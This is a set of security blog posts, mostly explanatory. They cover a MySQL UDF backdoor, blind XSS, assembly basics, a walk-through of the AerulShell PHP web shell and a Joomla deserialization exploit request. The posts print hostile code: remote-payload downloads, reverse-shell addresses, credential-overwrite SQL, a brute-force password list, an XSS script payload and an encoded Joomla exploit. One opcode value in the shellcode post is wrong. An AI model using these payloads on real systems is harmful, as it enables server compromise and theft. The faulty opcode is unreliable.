Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

MySQL Backdoors in UDFs

Thought this blog by securusglobal about MySQL Backdoor with udf was interesting. In Short, a UDF is a user-defined-function in MySQL. In general you can use it to manipulate column values for example in a select statement without having to put the dirty non-Mysql logic (such as C/C++) inside the actual select statement. Example: select udf_tocelsius(temps.fahrenheit) from temps

But instead of doing some nice like a formula or calculation, as a bad guy you could perhaps do something like

char *cmd;
FILE *fp;
strcat(cmd, args->args[i]);
fp = popen(cmd, "r");


Which is C code that essentially runs systems commands (similar to the system() function) against the operating system, so you could pass in commands that download your malware, execute it, etc.

Please note this is not a vulnerability, this is more of just an example of a backdoor persistence method. Of course a lot of things have to be setup correctly for this to even work, so for example if the attacker didn't have appropriate access or permissions were locked down tight, this might never even work. But interesting though none-the-less.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

SIEM Implementation (Security Incident and Event Management)

Just thought I'd throw together some items that I've experienced as being critical to the implementation and long-term success of a SIEM.

1.) Staff to manage the Infrastructure (uptime, performance, storage, upgrades)
2.) Staff to administer the SIEM (rule/alert tuning and creation, log sources collection and monitoring)
3.) Staff to monitor and analyze the alerts (ensure you have enough to manage the queue quickly and hit all SLAs)
4.) System Resources (Enough hardware, licenses, etc. so you don't drop logs, and can correlate events quickly, etc.)
5.) Custom Alerts for your Environment (disable most of the defaults, write the rules specific to what should or shouldn't happen in your company)
6.) Constant Tuning of existing Alerts (to ensure analysts are only working on useful alerts and not noisy junk)
7.) Constant Adding/Enhancing of Alerts (as new security trends pop up, quickly add new alerts to capture them)
8.) Add accurate and relevant Intel (don't blindly take free feeds, make sure the intel you gather is accurate and relevant to your environment)
9.) Log Sources Processes (ensure processes exist so whenever a new device, server, or app is brought up it doesn't go-live until you're getting logs)
10.) Document all alerts (generate a history for devices, servers, users, ips, urls, etc. so that analysts have context and don't have to re-invent the wheel)
11.) Data Classification (analysts must know what your sensitive data is and where is resides so they know what they're protecting and know when to raise red flags)
12.) Management support (you need managers that show interest and concern for things like alert queues, SLAs, false positive rates, etc. to drive improvement)


It's a lot, but if you have those things it would seem that a SIEM can be a valuable tool in your layered Security!

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

SiteCore Security Hardening

Thought this security hardening article by Rackspace was useful for those supporting SiteCore environments. To quickly summarize

1. Deny anonymous users access to key folders (e.g. keep bad guys out from reconing your admin, config, debug, and other folders)
2. Disable client RSS feeds (this prevents bad guys from getting access to modify or see sensitive data)
3. Secure the file upload functionality (e.g. disable execute permissions, apply a strong and strict filter, etc.
4. Improve the security of the website folder (e.g. move non-web folders like data and indexes out of the web root)
5. Increase login security (e.g. enable HTTPS and disable auto-complete)
6. Limit access to certain file types (e.g. block access to your configuration files, transformation files, etc.)
7. Protect PhantomJS (e.g. get rid of this tool, it's generally not needed but could be used against you)
8. Protect media requests (e.g. only allow server generated requests to be processed on images)
9. Remove header information from responses sent by your website (e.g. remove response headers to prevent information leakage)


More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Chrome to Mark HTTP as Insecure

It's exciting to see that Google Chrome will start marking HTTP login pages as insecure in January 2017.

To help users browse the web safely, Chrome indicates connection security with an icon in the address bar. Historically, Chrome has not explicitly labelled HTTP connections as non-secure. Beginning in January 2017 (Chrome 56), we’ll mark HTTP sites that transmit passwords or credit cards as non-secure, as part of a long-term plan to mark all HTTP sites as non-secure.

So I did a quick before & after to show you what it looks like. You can try this yourself by going to chrome://flags and changing "mark non-secure origins as non-secure" from Default to "mark non-secure origins as non-secure"



BEFORE you made that change an HTTP login page would look like this



AFTER you made that change an HTTP login page would look like this (notice the little red exclamation mark next to the url)



And if you were to click into the red exclamation marks to see the details it says



Why is this a good thing? Because HTTPS does multiple things for your that are critical on the internet. The obvious one is encryption, so your password are encrypted and not sent over the internet in plain text. But I've also blogged about how HTTPS gives you more than just encryption! 1.) Authenticity, Integrity, 3rd Party Vetting, Revocation and more. If you're surfing the internet over HTTP you can't trust it at all. Even if it's just a plain website. Why? There could be a man-in-the-middle monitoring your traffic, serving up and injecting code and malware, and you wouldn't even know it.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Blind Cross-site Scripting (BXSS)

Matthew Bryant (@IAmMandatory) wrote a great blog post a bit ago Breaching a CA – Blind Cross-site Scripting (BXSS) in the GeoTrust SSL Operations Panel Using XSS Hunter. It has a pretty cool concept of BXSS (Blind XSS) ( or Blind Cross Site Scripting).

What is XSS?

XSS (or Cross Site Scripting) is a vulnerability in a website where you can inject Javascript code into a user input parameter (perhaps the url, query string, cookie, textbox, etc.) and because the developer did not properly validate the user input, when the HTTP response is returned and the web page is displayed by your browser, the browser mistakenly runs your user-inputted javascript. Why is this a problem? If a malicious actor can get you to click on a link and run their javascript in your browser, they can potentially compromise your browser, credentials, or even your entire system. They can inject key loggers, malware, etc. Bad Stuff.

What is BXSS?

With XSS defined above you get that immediate feedback. With BXSS you don't! I have written about BXSS once before. In short, you submit some malicious XSS user input somewhere, but the intent is not to exploit the system you're inputting the data into. Instead you're hoping to exploit and run Javascript on a different system that also manages that same data, likely at a later date. Great examples of this are websites that allow you to rate products and put comments in. If you were to inject comments into that textbox, one example of BXSS would be that hopefully when the Product Review person view your review on their internal intranet website from their cubical that the XSS code will execute on that local intranet site. Thus as the attacker you're blind, you submitted the XSS payload on the website product page, but you don't see the results, you don't get immediate feedback, you won't know if it worked until a few hours or days later when that Product Review specialist opens up your comments and attempts to moderate (approve/disapprove) them.

More from Matthew's blog

Matthew used the tool XSS Hunter which allows you to submit XSS attacks and it gives you detailed information about if the attack was successful or not, including things like screenshots of the webpage, the html code that displayed on the web page, etc. Perfect for BXSS because even though you couldn't technically see the exploit running, XSS Hunter gives you all the details as if you did.

It's an interesting concept too that Matthew mentions "In the world of blind payload testing, context is everything. You may only trigger the vulnerability a single time so you must have as much information as possible if you want to get it fixed." Basically the moderator may only ever moderate or review your comment once. Thus your first payload can't be an alert(1) test! Your first payload has to be the real-deal and it has to work the first time!

To explain Matthew's GeoTrust attack here's a short summary "during my testing I found an unintended vulnerability in GeoTrust’s Operations Panel when a support agent viewed my certificate request information. I woke up one morning with an XSS Hunter payload fire email titled [XSSHunter] XSS Payload Fired On https://ops.geotrust.com/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp in my inbox"

XSS Hunter showed him this code, and notice that the data[i].Customer is concatenated and ends up being displayed as html without any validation or sanitization.

for(i = 0; i < count; i++){ table = table + "<tr><td>" + data[i].ID + "</td><td>" + data[i].Product + "</td><td>" + data[i].Customer + "</td><td>" + (data[i]).Date + "</td><td>" + data[i].State + "</td></tr>";
}


So all Matthew had to do was inject the Customer field with this value

"><script src=https://y.vg></script>

And the internal Support Agent on the Intranet in his cubicle suddenly will load Matthew's evil XSS Hunter url (https://y.vg) and that url will download keyloggers, screenshots takers, or whatever other mayhem the attacker would like to inflict.

<tr><td>13785664</td><td>GeoTrust SSL Trial</td><td>"><script src="https://y.vg"></script></td><td>06/06/2016 05:40:04</td><td>Waiting for Whois Approval</td></tr>

To protect against XSS and BXSS you need to perform input validation on all user-input. User input remember can come from anywhere! Recall my blog post about What is the 'input' in input validation? In this case you can't forget that even the values in an SSL Certificate such as Customer should be consider user input, thus untrusted, and thus it needs sanitized. To sanitize you would ideally setup a regex that whitelists allowed characters / format , and you would use a standard XSS prevention library to strip out or encode malicious characters.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, September 2, 2016

Intel Assembly Basics: Segment Registers

Intel Assembly Basics

6 16-bit segment registers

1.) CS #code segment
2.) DS #data segment
3.) SS #stack segment
4.) ES #extra segment
5.) FS #general purpose segment
6.) GS #general purpose segment


Base address of a segment, thus accessed with offsets to an address. Example:

mov DS:[eax], ebx


Moves the data in ebx onto the Data Segment ... but where? The address of the data segment plus the value in eax gets you the final address.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Intel Assembly Basics: EIP Register

Intel Assembly Basics

EIP # instruction pointer, points to next instruction, goal of most attacks is to control this



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Intel Assembly Basics: General Purpose Registers

Intel Assembly Basics

8 general purpose registers
1.) EAX #can also access hi/lo order 8 bits (AH/AL)
2.) EBX #can also access hi/lo order 8 bits (BH/BL)
3.) ECX #used by many string instructions as a counter, can also access hi/lo order 8 bits (CH/CL)
4.) EDX #can also access hi/lo order 8 bits (DH/DL)
5.) ESI #used by many string instructions as a source pointer, can also access lo order 16 bits (SI)
6.) EDI #used by many string instructions as a destination pointer, can also access lo order 16 bits (DI)
7.) EBP #used in many stack operations, generally contain addresses, if wrong address can cause app to crash, can also access lo order 16 bits (BP)
8.) ESP #can also access lo order 16 bits (SP)




More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Intel Assembly Basics: Opcode & Shell Code

Intel Assembly Basics
return 0;

Could be represented by this

leave
xor eax, eax
ret


Which have lower level cpu OpCodes of these values

leave # 0xC9
xor eax, eax # 0x31, 0xc0
ret # 0xC9


Which means if you wanted to create a shellcode of the 'return 0' statement in C you'd do the following.

unsigned char shellcode[] = "\xc9\x31\xc0\xc9";

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Intel Assembly Basics: return 0;

Intel Assembly Basics
return 0;

Could be represented by this

leave # destroys the stack frame
xor eax, eax # sets 0 to the eax register (xor is faster than setting it to 0, 1 or other not both)
ret # returns control back to the calling program




More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Thursday, September 1, 2016

AerulShell Web Shell Code Walk-Through

This Paste of the AerulShell v.4 appears to be a php webshell that an attacker can upload and get him backdoor access to compromise and manage your web server without you knowing it.

It's got some interesting features/pieces.

For authentication it requires that the parameter 'x' posted to the url has an md5 hash of c2b72f86b8ca51642c4a902887830d3e.

$auth_pass = "c2b72f86b8ca51642c4a902887830d3e";
if( ... ( md5($_POST['x']) == $auth_pass ) ) )
{ $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; }


Which if you go to an md5 decryptor like this you see that the password is aerulcyber so you could login to it with something like www.hackedsite.com/evilpage.php?x=aerulcyber

Also if there is a login failure then it sends an email to the 'Boss' at root@aerulcyber.biz . How do I know this? If there is a login failure it calls PrintLogin() which is deceptively names as it actually has some obfuscated code of it's own.

function printLogin()
...
$shell_data = "JHZpc2l0Y291bn...;
eval(base64_decode($shell_data));


Which if deobfuscated actually sets a cookie on your browser, counts how many times you've been there, and sends an email with your ip address to the Boss.


$visitcount = $HTTP_COOKIE_VARS["visits"];
...
$visitor = $_SERVER["REMOTE_ADDR"];
...
$body = "Boss, there was an injected target on $target by $visitor";
@mail("root@aerulcyber.biz","http://$target $system by $visitor", "$body");


Also if you were to navigate to this page without the 'x' parameter it deceptively will look like an HTTP 404 page not found. But you should notice a textbox and submit button on the bottom. IF you enter the password mentioned above into the textbox and hit submit, it will log you into the web shell console.

<html>
...
<title>
404 Not Found
</title>
...
<form method=post>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80<center><input type=password name=x><input type=submit
value=''></center></address>
</form>


If you pass in the 'dl' parameter once logged in you can download a file, such as www.hackedsite.com/evil.php?dl=index.php would download the home page code.

if(isset($_GET['dl']) && ($_GET['dl'] != "")){
$file = $_GET['dl'];
$filez = @file_get_contents($file);
...echo $filez;


You could delete a file

if(isset($_GET['delete']) && ($_GET['delete'] != ""))
$file = $_GET['delete']; @unlink($file);


You could make a folder

elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != ""))
$path = $pwd.$_GET['mkdir']; @mkdir($path);


You could get a shell and post commands to it

elseif(isset($_GET['x']) && ($_GET['x'] == 'shell'))
<form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">
<table class="cmdbox">
<tr>
<td colspan="2">
<textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>


There's also attempts to download exploits , run them, and elevate you to root

$pilih = $_POST['pilih'];
if ( $pilih == 'autoroot1') {
mkdir('auto',0777);
$file = file_get_contents('http://svchost.nazuka.net/a.txt');
$IIIIIIIIl11I = fopen('auto/auto.pl','w');
chmod("auto/auto.pl",0777);
fwrite($IIIIIIIIl11I,$file);
fclose($IIIIIIIIl11I);
print 'autoroot telah diluncurkan Boss....


There are also additional "bonus tools" that the shell will download and execute , basically stripping text off pastebin.

$file = file_get_contents('http://pastebin.com/raw.php?i=gtTLMyya');
$IIIIIIIIl11I = fopen('meter.php','w');

$file = file_get_contents('http://pastebin.com/raw.php?i=ctQsPjpn');
$IIIIIIIIl11I = fopen('wy.php','w');

$file = file_get_contents('http://pastebin.com/raw.php?i=mGSK1EEa');
$IIIIIIIIl11I = fopen('back.php','w');

$file = file_get_contents('http://pastebin.com/raw.php?i=aBHs2nWR');
$IIIIIIIIl11I = fopen('back.pl','w');


You can pull up a reverse shell back to these ip addresses , it events gives the attacker friendly hints/reminders on how to use it.

+--=[ Backconnect Reverse Shell ]=--+
...
Choose Backconnect Command
...
<form method="post" action="">&
...
<option value="back1" > Perl Backconnect </option>
<option value="back2"> Php Backconnect </option>
<option value="back3"> Weevely </option>
<option value="back4"> Php Metasploit </option>
...
edit pada source script back.pl
my $ip = '222.255.167.45';
my $port = '57899';
...
edit pada source script back.php
$ip = '222.255.167.45';
$port = 57899;
...
edit pada source script back.pl
my $ip = '222.255.167.45';
my $port = '57899';
...
edit pada source script meter.php
$ip = '222.255.167.45';
$port = 57899;
...
usage : nc -lvvp 57899


You can upload a file to the hacked web server with a tool of your choice

<th colspan="2">Upload from url</th>
...
<option value="wwget">wget</option>
<option value="wlynx">lynx</option>
<option value="wfread">fread</option>
<option value="wfetch">fetch</optoion>
<option value="wlinks">links</option>
<option value="wget">GET</option>
<option value="wcurl">curl</option>


You can deface the site and tell them why you did it

elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){?>

<input class="inputz" type="text" name="defacer" size="67" value="Aerul Da White-Hkc" /><br> <select class="inputz" name="hackmode">
<option>------------------------------------SELECT-------------------------------------</option>
<option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
<option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
<option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
<option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
<option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
<option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
<option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
<option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
<option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
<option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
<option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
<option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
<option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
<option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
<option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
<option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
<option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
<option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
<option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
...
<select class="inputz" name="reason">
<option >------------------------------------SELECT-------------------------------------</option>
<option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
<option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
<option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
<option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
<option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
<option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
<option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>


You could launch a port scan on somebody

function sws_port_scan($ip)
{
$list_post = array('80','21','22','2082','25','53','110','443','143');
foreach ($list_post as $o_port)
{
$connect = @fsockopen($ip,$o_port,$errno,$errstr,5);


Change the Joomla or Wordpress administrative passwords

$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());


Try to bruteforce guess some default passwords

+--==[ Cpanel BruteForce ]==--+

abcd1234
abcdef
acb123
adm1n1strator
adm1nistrator
admin@123
admin1
ADMIN1
admin12
admin123
admin1234
admin123456


There are many more features if you dig deeper into the code. But hopefully this information above gives a good overview of the power and danger of web shells like AerulShell and gives you a bit more insight into the interworkings and the thought process behind the writers of web shells like this.







More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Joomla DeSerialize Deobfuscation 101

Saw this web request , it is the Joomla unserialize vulnerability. Going to walk through below how to see what it's doing.

GET /

}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3738:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbWVkaWEveHh4eC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDIxbFpHbGhMMk56Y3k1d2FIQWlJRHNOQ2lSMFpYaDBJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQTZMeTl0Y25SbkxuVnBMbkJvYVc1dFlTNWxaSFV1Y0dndlkyOXRjRzl1Wlc1MGN5OXFiMjl0YkdFdWRIaDBKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJwdFlXbHNMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5cWJXRnBiSG91ZEhoMEp5azdEUW9rYjNCbGJqSWdQU0JtYjNCbGJpZ2tZMmhsWTJzeUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNHVnVNaXdnSkhSbGVIUXlLVHNOQ21aamJHOXpaU2drYjNCbGJqSXBPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR05vWldOck1pa3BldzBLSUNBZ0lHVmphRzhnSkdOb1pXTnJNaTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeklpT3cwS1pXTm9ieUFpWkc5dVpUSWdMbHh1SUNJZ093MEtEUW9rWTJobFkyc3pQU1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDBndWFIUnRJaUE3RFFva2RHVjRkRE1nUFNCb2RIUndYMmRsZENnbkp5azdEUW9rYjNBelBXWnZjR1Z1S0NSamFHVmphek1zSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3TXl3a2RHVjRkRE1wT3cwS1ptTnNiM05sS0NSdmNETXBPdzBLRFFva1kyaGxZMnMwUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJOb1pXTnJMbkJvY0NJZ093MEtKSFJsZUhRMElEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5eGNTNTBlSFFuS1RzTkNpUnZjRFE5Wm05d1pXNG9KR05vWldOck5Dd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTBMQ1IwWlhoME5DazdEUXBtWTJ4dmMyVW9KRzl3TkNrN0RRb05DaVJqYUdWamF6VTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2TDIxbFpHbGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTlNBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmJYSjBaeTUxYVM1d2FHbHViV0V1WldSMUxuQm9MMk52YlhCdmJtVnVkSE12Y1hGNkxuUjRkQ2NwT3cwS0pHOXdOVDFtYjNCbGJpZ2tZMmhsWTJzMUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEVXNKSFJsZUhRMUtUc05DbVpqYkc5elpTZ2tiM0ExS1RzTkNnMEtKR05vWldOck5qMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMM05sYzNOcGIyNHZjMlZ6YzJsdmJpNXdhSEFpSURzTkNpUjBaWGgwTmlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk5VlNFRkhWRGc0TnljcE93MEtKRzl3TmoxbWIzQmxiaWdrWTJobFkyczJMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRFlzSkhSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0lpT3cwS0pITjFZbXBsWTNRZ1BTQW5TbTl0SUhwNmVpQW5JQzRnSkY5VFJWSldSVkpiSjFORlVsWkZVbDlPUVUxRkoxMDdEUW9rYUdWaFpHVnlJRDBnSjJaeWIyMDZJRXRsYTJ0aGFTQlRaVzV6Wlc0Z1BIWnZibEpsYVc1b1pYSjZTMnhoZFhOQVUyRnBhMjkxYm1GSWFXSnBMbU52YlQ0bklDNGdJbHh5WEc0aU93MEtKRzFsYzNOaFoyVWdQU0FpVTJobGJHeDZJRG9nYUhSMGNEb3ZMeUlnTGlBa1gxTkZVbFpGVWxzblUwVlNWa1ZTWDA1QlRVVW5YU0F1SUNJdmJHbGljbUZ5YVdWekwycHZiMjFzWVM5cWJXRnBiQzV3YUhBL2RTSWdMaUFpWEhKY2JpSWdMaUJ3YUhCZmRXNWhiV1VvS1NBdUlDSmNjbHh1SWpzTkNpUnpaVzUwYldGcGJDQTlJRUJ0WVdsc0tDUjBiM29zSUNSemRXSnFaV04wTENBa2JXVnpjMkZuWlN3Z0pHaGxZV1JsY2lrN0RRb05Da0IxYm14cGJtc29YMTlHU1V4RlgxOHBPdzBLRFFvTkNqOCsnKSk7DQpmY2xvc2UoJGZwKTs='));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd


Joomla wasn't validating input and when de-serializing this blob above would actually evaluate and execute some of it. What you may ask? Well take the base64 encoded stuff and do a quick decode and you get.

$check = $_SERVER['DOCUMENT_ROOT'] . "/media/xxxx.php" ;
$fp=fopen("$check","w+");
